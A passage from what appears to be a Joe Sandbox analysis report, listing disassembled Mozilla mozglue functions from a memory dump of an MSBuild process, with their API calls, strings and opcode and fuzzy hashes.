                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f899b9250748cc2e25e65c2fcf07b466ffbd44bf0ee38af5cbbb2ca00518699
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BB1F371A005518FDB18DF7CC9A476D77BAAF42328F184669E416EBB86DB3098C4CB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB1AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8670aea69b487aed863c185d98982dbc6db741ffeea8eab4900692212355b43a
                                                                                                                                                                                                                                                                            • Instruction ID: 2dec6f563a1b99c1bc3553f8c995f8d6176ff461166d1f16fd22bc7dad7f7b02
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8670aea69b487aed863c185d98982dbc6db741ffeea8eab4900692212355b43a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 053172B1904B558FDB00AF7DD64826EBBF0FF85305F014A2DE98987255EB749448CB82
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB09D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB08273), ref: 6CB09D65
                                                                                                                                                                                                                                                                            • free.MOZGLUE(6CB08273,?), ref: 6CB09D7C
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?), ref: 6CB09D92
                                                                                                                                                                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CB09E0F
                                                                                                                                                                                                                                                                            • free.MOZGLUE(6CB0946B,?,?), ref: 6CB09E24
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?), ref: 6CB09E3A
                                                                                                                                                                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CB09EC8
                                                                                                                                                                                                                                                                            • free.MOZGLUE(6CB0946B,?,?,?), ref: 6CB09EDF
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?), ref: 6CB09EF5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 956590011-0
                                                                                                                                                                                                                                                                            • Opcode ID: 46385be6960722380e9ee0a415a839e25d4bab6773fa3e3341246d5b38b53ed7
                                                                                                                                                                                                                                                                            • Instruction ID: 4e006e3c886e7d0d403d407ba8a91557b27bdd135d6dfd86cb69032645690a91
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46385be6960722380e9ee0a415a839e25d4bab6773fa3e3341246d5b38b53ed7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1471AFB0A09B818BD712CF18C58055BF7F4FF99316B448619E89A5BB01EB30F8C9CB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB0DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CB0DDCF
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CAEFA4B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB090E0: free.MOZGLUE(?,00000000,?,?,6CB0DEDB), ref: 6CB090FF
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB090E0: free.MOZGLUE(?,00000000,?,?,6CB0DEDB), ref: 6CB09108
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB0DE0D
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB0DE41
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB0DE5F
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB0DEA3
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB0DEE9
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CAFDEFD,?,6CAC4A68), ref: 6CB0DF32
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB0DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CB0DB86
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB0DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CB0DC0E
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CAFDEFD,?,6CAC4A68), ref: 6CB0DF65
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB0DF80
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAD5EDB
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: memset.VCRUNTIME140(6CB17765,000000E5,55CCCCCC), ref: 6CAD5F27
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAD5FB2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 112305417-0
                                                                                                                                                                                                                                                                            • Opcode ID: d0133a966e1fdf93da978282e5511a8e169daab9be767d3bd09ccf0de7f9b95b
                                                                                                                                                                                                                                                                            • Instruction ID: 074773fa35d1c2848330fb83bce10f8788be46d9d2b758dc2105cef25bbf2c04
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0133a966e1fdf93da978282e5511a8e169daab9be767d3bd09ccf0de7f9b95b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2751E8767016919BDB219B38E8806AFB776FF91308F96451CD81A53B80DB31F859CB83
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB15D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15D32
                                                                                                                                                                                                                                                                            • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15D62
                                                                                                                                                                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15D6D
                                                                                                                                                                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15D84
                                                                                                                                                                                                                                                                            • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15DA4
                                                                                                                                                                                                                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15DC9
                                                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6CB15DDB
                                                                                                                                                                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15E00
                                                                                                                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CB15C8C,?,6CAEE829), ref: 6CB15E45
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2325513730-0
                                                                                                                                                                                                                                                                            • Opcode ID: 884659bfaebd2a8ecc6cd8d57fec3281647ed7ef80a4fba4f7a36aed8cbd283f
                                                                                                                                                                                                                                                                            • Instruction ID: 18c442f7dfb8459e16f430ae0b243f7a558f0cfc8746f4fdb3d5b84f26f90fda
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 884659bfaebd2a8ecc6cd8d57fec3281647ed7ef80a4fba4f7a36aed8cbd283f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A418F31B042558FCB10DF65C899EAE77B9FF89318F044069E50A97B91DB34EC09CB65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAECC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CAB31A7), ref: 6CAECDDD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                            • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                            • Opcode ID: 129167b493d1d014188981643524df4af30131c4a7cef01a38db7f97056c088f
                                                                                                                                                                                                                                                                            • Instruction ID: 8212485d2fc386349fc023f455e72092d80a0c4c424d98d3bf4db259b398e828
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 129167b493d1d014188981643524df4af30131c4a7cef01a38db7f97056c088f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F31D6317403156BEF10AEA98C45BAE7F75BB4971CF344015F618AB6C0DB71D8809BE0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CABECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABF100: LoadLibraryW.KERNEL32(shell32,?,6CB2D020), ref: 6CABF122
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CABF132
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000012), ref: 6CABED50
                                                                                                                                                                                                                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CABEDAC
                                                                                                                                                                                                                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CABEDCC
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32 ref: 6CABEE08
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CABEE27
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CABEE32
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CABEBB5
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CAED7F3), ref: 6CABEBC3
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CAED7F3), ref: 6CABEBD6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CABEDC1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                            • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                            • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                                            • Opcode ID: 057772f58199fdf4f9b8a5a12e4ab70d7520771ce4a20497d73528b21aaaae13
                                                                                                                                                                                                                                                                            • Instruction ID: bd6f3776f1423d8b998d8388f3ca8207354e00c75fe4180e6744b4bc92e56167
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 057772f58199fdf4f9b8a5a12e4ab70d7520771ce4a20497d73528b21aaaae13
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39510171D053449BDB00DF68C9406EEB7B8AF49318F08886DE8557B780E774A9C8CBE2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB2A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CB2A565
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB2A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB2A4BE
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB2A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB2A4D6
                                                                                                                                                                                                                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CB2A65B
                                                                                                                                                                                                                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CB2A6B6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                                                                            • String ID: 0$z
                                                                                                                                                                                                                                                                            • API String ID: 310210123-2584888582
                                                                                                                                                                                                                                                                            • Opcode ID: 8ed64ac78575fa512eb98b616ba8ba108c9454ce4e6f1a6d472078898ab6d814
                                                                                                                                                                                                                                                                            • Instruction ID: 22291dd6e1df24bcbb786a271509978b7558850c417de552aaeccfeaf596edc5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ed64ac78575fa512eb98b616ba8ba108c9454ce4e6f1a6d472078898ab6d814
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F4106719097859FC341DF28C480A9BBBE5FF89354F408A2EF49987650EB34E589CB93
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAF9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: EnterCriticalSection.KERNEL32(6CB3E370,?,?,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284), ref: 6CAEAB94
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: LeaveCriticalSection.KERNEL32(6CB3E370,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAEABD1
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAC4A68), ref: 6CAF945E
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CAF9470
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CAF9482
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAF949F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CAF947D
                                                                                                                                                                                                                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CAF946B
                                                                                                                                                                                                                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CAF9459
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                            • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                            • Opcode ID: fb345ce2e0717b4a53bd4dabe872e79e4c5ae9be91e9cbe7db1917465fb39e24
                                                                                                                                                                                                                                                                            • Instruction ID: 06d3a80ca3d2d0c070a2549f26c50effc66609e21043475dcf4274cc65211524
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb345ce2e0717b4a53bd4dabe872e79e4c5ae9be91e9cbe7db1917465fb39e24
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66012874A0011097D7209F6CDA04A8D33B9DB19339F0C0537E85E87B41DB35D8DA899B
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB01D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB01D0F
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,6CB01BE3,?,?,6CB01D96,00000000), ref: 6CB01D18
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,6CB01BE3,?,?,6CB01D96,00000000), ref: 6CB01D4C
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB01DB7
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB01DC0
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB01DDA
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB01EF0: GetCurrentThreadId.KERNEL32 ref: 6CB01F03
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB01EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CB01DF2,00000000,00000000), ref: 6CB01F0C
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB01EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CB01F20
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CB01DF4
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
